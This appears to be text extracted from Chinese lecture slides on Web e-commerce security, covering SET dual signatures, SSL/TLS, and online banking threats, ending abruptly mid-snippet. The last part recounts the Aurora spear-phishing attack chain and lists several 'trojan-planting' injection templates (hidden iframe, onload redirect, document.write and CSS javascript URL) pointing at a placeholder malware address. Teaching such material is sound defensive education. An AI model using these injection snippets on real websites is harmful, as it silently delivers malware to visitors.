第12章Web電子商務安全

Web電子商務安全第十二章主講人：任凱聯(lián)系方式：renkai_jlxy@163.com百度云盤：/s/1qWykdjQ1第十二章WEB電子商務安全12.1電子商務概述12.2安全電子商務的體系結構12.3安全電子交易SET12.4安全套接字層SSL12.5數(shù)字現(xiàn)金協(xié)議12.6網(wǎng)上銀行2B2C是從企業(yè)到終端客戶（包括個人消費者和組織消費者）的業(yè)務模式。

B2B是企業(yè)與企業(yè)之間的業(yè)務模式。電子商務模式3（1）冒名偷窺。（2）篡改數(shù)據(jù)。（3）信息丟失。（4）信息傳遞過程中的破壞。

12.1.2電子商務的安全4Internet12.2安全電子商務的體系結構

網(wǎng)絡平臺電子商務基礎平臺電子商務應用系統(tǒng)CA認證中心、支付網(wǎng)關、客戶服務中心

網(wǎng)上投標

網(wǎng)上訂票

網(wǎng)上交費

網(wǎng)上銀行

網(wǎng)上超市

遠程醫(yī)療5背景：VISA與MASTERCARD兩大信用卡國際組織共同發(fā)起制定保障在因特網(wǎng)上進行安全電子交易的SET(SecureElectronicTransaction)協(xié)議由眾多信息產(chǎn)業(yè)公司，如Microsoft、Netscape、RSA等共同協(xié)作發(fā)展而成用途：圍繞客戶、商家等交易各方相互之間身份的確認，采用了電子證書等技術，以保障交易安全12.3安全電子交易SET

612.3.1SET協(xié)議概述SET協(xié)議主要內(nèi)容加密算法（RSA和DES）的應用證書消息和對象格式購買消息和對象格式付款消息和對象格式參與者之間的消息協(xié)議712.3.1SET協(xié)議概述SET支付系統(tǒng)中的相關成員：

81.SET協(xié)議消息傳輸過程SET協(xié)議消息發(fā)送過程:

數(shù)字信封：將對稱密鑰通過非對稱公鑰加密的結果分發(fā)對稱密鑰的方法12.3.2SET協(xié)議工作原理91.SET協(xié)議消息傳輸過程

SET協(xié)議消息接收過程：12.3.2SET協(xié)議工作原理10(1)消費者互聯(lián)網(wǎng)購買的物品并形成訂貨單。訂貨單上需包括在線商店、購買物品名稱及數(shù)量、交貨時間及地點等相關信息(2)消費者選擇付款方式、確認訂單、簽發(fā)付款指令。SET開始介入(3)在SET中，消費者必須對訂單和付款指令進行數(shù)字簽名，同時利用雙重簽名技術保證商家看不到消費者的賬號信息(4)在線商店接受訂單后，向消費者所在銀行請求支付認可。信息通過支付網(wǎng)關到持卡人的發(fā)卡銀行請求支付認可。批準交易后，返回確認信息給電商(5)電商發(fā)送訂單確認信息給消費者(6)電商發(fā)送貨物或提供服務，支付網(wǎng)關通知發(fā)卡銀行請求支付(7)消費者確認收貨后，支付網(wǎng)關支付給收款銀行2.SET協(xié)議流程

12.3.2SET協(xié)議工作原理113.雙重簽名產(chǎn)生背景：消費者不想讓銀行看到訂單細節(jié)，同時也不想讓商家看到銀行支付信息

例如消息A是訂單信息，消息B是支付信息，或者互換一下12.3.2SET協(xié)議工作原理123.雙重簽名消息的驗證例如消息A是訂單信息，消息B是支付信息12.3.1SET協(xié)議工作原理13Netscape公司開發(fā)的一個網(wǎng)絡安全協(xié)議已成為事實上的安全網(wǎng)上交易標準協(xié)議三個版本：SSL1.0SSL2.0SSL3.0IETF發(fā)布了TLS(TransportLayerSecurity),TLS1.0

通常被稱作SSL3.1TLS1.1TLS1.2SSL與SET最大不同在于SSL是一個雙方協(xié)議，僅提供通信雙方的安全保證，而SET協(xié)議則提供通信多方的安全保證SSL比SET簡單得多，目前在Web服務中已廣泛使用

12.4安全套接字層SSL(SecureSocketsLayer，SSL）1412.4.1SSL概述SSL功能：客戶認證服務器身份服務器認證客戶身份客戶與服務器自動協(xié)商生成密鑰加密客戶與服務器間的數(shù)據(jù)，并可抵御重放攻擊檢測客戶與服務器間數(shù)據(jù)的完整性151.SSL協(xié)議體系結構SSL僅被廣泛用于HTTP連接SSL位于TCP和應用層協(xié)議(如HTTP)之間理論上，SSL可以運行于任何TCP/IP應用程序之上，而不用對其做任何修改12.4.2SSL工作原理16SSL記錄協(xié)議在客戶機和服務器之間傳輸應用數(shù)據(jù)和SSL控制數(shù)據(jù)2.SSL記錄協(xié)議12.4.2SSL工作原理172.SSL記錄協(xié)議SSL記錄協(xié)議報文格式：

12.4.2SSL工作原理18NetworkandInformationSecurity12.4.2SSL工作原理3.SSL改變密碼規(guī)范協(xié)議和告警協(xié)議195.SSL握手協(xié)議：該協(xié)議允許客戶和服務器相互驗證、協(xié)商加密和MAC算法以及密鑰，用來保護SSL記錄發(fā)送的數(shù)據(jù)。12.4.2SSL工作原理20網(wǎng)絡釣魚流程圖2112.6網(wǎng)上銀行網(wǎng)絡釣魚(SpearPhishing)極光行動（Aurora）2009年12月中旬可能源自中國“精心策劃且目標明確”的一場網(wǎng)絡攻擊，其名稱“Aurora”（意為極光、歐若拉）來自攻擊者電腦上惡意文件所在路徑的一部分。遭受攻擊的除了Google外，還有20多家公司：其中包括AdobeSystems、JuniperNetworks、Rackspace、雅虎、賽門鐵克、諾斯洛普·格魯門和陶氏化工Google表示有部分知識產(chǎn)權遭到盜竊。它認為，黑客的主要興趣在于訪問中國持不同政見者的Gmail帳戶美國國務卿希拉里·克林頓發(fā)表了一則簡短聲明譴責此次攻擊事件，并要求中國作出回應[12]。中國政府當時并未做出正式回應美國國會計劃對Google的指控進行調(diào)查，后者指控中國政府利用計算機服務監(jiān)視人權活動人士2212.6網(wǎng)上銀行網(wǎng)絡釣魚(SpearPhishing)極光行動（Aurora）攻擊過程回放：搜集Google員工在Facebook、Twitter等社交網(wǎng)站上發(fā)布的信息；利用動態(tài)DNS供應商建立托管偽造照片網(wǎng)站的Web服務器，Google員工收到來自信任的人發(fā)來的網(wǎng)絡鏈接并且點擊，含有shellcode的JavaScript造成IE瀏覽器溢出，遠程下載并運行程序；通過SSL安全隧道與受害人機器建立連接，持續(xù)監(jiān)聽并最終獲得該雇員訪問Google服務器的帳號密碼等信息；使用該雇員的憑證成功滲透進入Google郵件服務器，進而不斷獲取特定Gmail賬戶的郵件內(nèi)容信息2312.6網(wǎng)上銀行網(wǎng)絡釣魚(SpearPhishing)極光行動（Aurora）從用戶單擊釣魚郵件那一刻開始講起1.三次握手建立連接2.攻擊者的機器收到一個GET請求3.數(shù)據(jù)包6返回了一個302碼（重定向頁面）4.從Details面板中可以看到一個Location域，它指明重定向位置是/info?rFfWELUjLJHpP在第9包上右擊“FollowTCPStream”2412.6網(wǎng)上銀行病毒2512.6網(wǎng)上銀行2612.6網(wǎng)上銀行根據(jù)顯示的內(nèi)容找到25包2712.6網(wǎng)上銀行已經(jīng)獲得了無限制的管理權限2812.6網(wǎng)上銀行一些常用的掛馬方式框架掛馬<iframesrc="網(wǎng)馬地址"width=0height=0></iframe>body掛馬<bodyonload="window.location='網(wǎng)馬地址';"></body>java掛馬<scriptlanguage=javascript>window.open("網(wǎng)馬地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>js文件掛馬將代碼“document.write("<iframewidth=0height=0src='網(wǎng)馬地址'></iframe>");”保存為muma.js文件，則js文件掛馬代碼為“<scriptlanguage=javascriptsrc=muma.js></script>”2912.6網(wǎng)上銀行一些常用的掛馬方式：css中掛馬body{background-image:url('javascript:document.write("<scriptsrc=/muma.js></script>")')}高級欺騙<ahref=(迷惑連接地址)onMouseOver="muma();r